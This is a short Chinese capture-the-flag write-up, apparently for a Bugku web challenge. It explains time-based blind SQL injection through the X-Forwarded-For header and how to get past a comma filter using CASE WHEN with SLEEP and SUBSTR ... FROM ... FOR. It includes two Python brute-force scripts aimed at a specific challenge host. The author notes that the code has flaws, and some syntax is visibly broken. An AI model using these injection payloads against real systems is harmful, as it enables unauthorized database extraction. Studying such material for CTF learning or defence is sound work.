case when exp1 then sleep(4) else 1 end 来绕过 ","的限制
exp1 中要用到substr来进行剪切,这个函数substr(str,1,1) 又是存在 “,” , 于是这里我又用 substr (str) from 1 for 1 来绕过 ","的限制
这里有详细的解释:、
基于时间的盲注,绕过过滤“,”的限制
基于时间盲注的解释
并不完整的代码解释:
代码可能有些小瑕疵,但是原理就是这样
先爆出名字的长度
```python
import requests
url="http://123.206.87.240:8002/web15/"
flag=""
for i in range(1,33):#爆出表名的长度
data="15' and (case (when (length(select group_concat(table_name) from information_schema.tables where table_schema=database()))==i) then sleep(4) else 1 end)#"
headers={"x-forwarded-for":data}
try:
resault=requests.get(url,headers=headers,timeout=3)
except:
print(i)
#最后得表名长度为4
截取每个字母进行爆破
import requests
url="http://123.206.87.240:8002/web15/"
flag=""
for i in range(0,4):
print("hahahahahahahhahaha")
for str1 in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,_!@#$%^&*.":#爆出表名的具体字母
data="15' and (case (when (substr(select group_concat(table_name) from information_schema.tables where table_schema=database()) from "+str(i)+" for 1)=="+str1+") then sleep(4) else 1 end)#"
headers={"x-forwarded-for":data}
try:
resault=requests.get(url,headers=headers,timeout=3)
except:
print(str1)
#最后得表名长度为4
完整代码参照这篇文章:
https://www.cnblogs.com/sijidou/p/9657026.html
小白学飞,大神指教